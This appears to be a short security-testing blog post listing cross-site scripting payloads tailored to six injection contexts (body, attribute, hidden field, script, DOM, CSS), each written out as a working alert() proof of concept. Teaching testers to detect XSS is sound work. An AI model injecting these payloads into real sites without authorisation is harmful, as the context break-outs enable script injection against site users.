In part_1 of this series we talked about how the generic payload — <script> alert(‘XSS’) </script> to test XSS; doesn’t execute in different contexts like HTML attribute, hidden variable, Javascript etc. In this post, we take a look at different payloads that we can use to effectively conclude presence of XSS.
Let us look at various payloads that we should use in different context.
1. Context — body
Payload — <script>alert(‘xss’)</script>
2. Context — HTML attribute
Payload — “ onmouseover=alert(‘xss’)
3. Context — hidden variable
Payload — “ accesskey=”X” onclick=”alert(‘XSS’)
Notes
1. Chrome (73) does not look to be vulnerable to this vulnerability.
2. You have to press alt+shift+accesskey(x) to get the pop-up box. For more details check here.
4. Context — JavaScript
Payload — </script> <script>alert(‘xss’)</script>
5. Context — DOM
Payload — <script>alert(%27xss%27)</script>
6. Context — CSS
Payload — } </style> <script>alert(‘xss’)</script>
Therefore, it is imperative to watch out where the user input is inserted and choose appropriate payload accordingly. We cannot just blindly go with <script>alert(‘XSS’)</script> and conclude whether an app is vulnerable to XSS.
The sample web application used for this demonstration is available for download on Github.
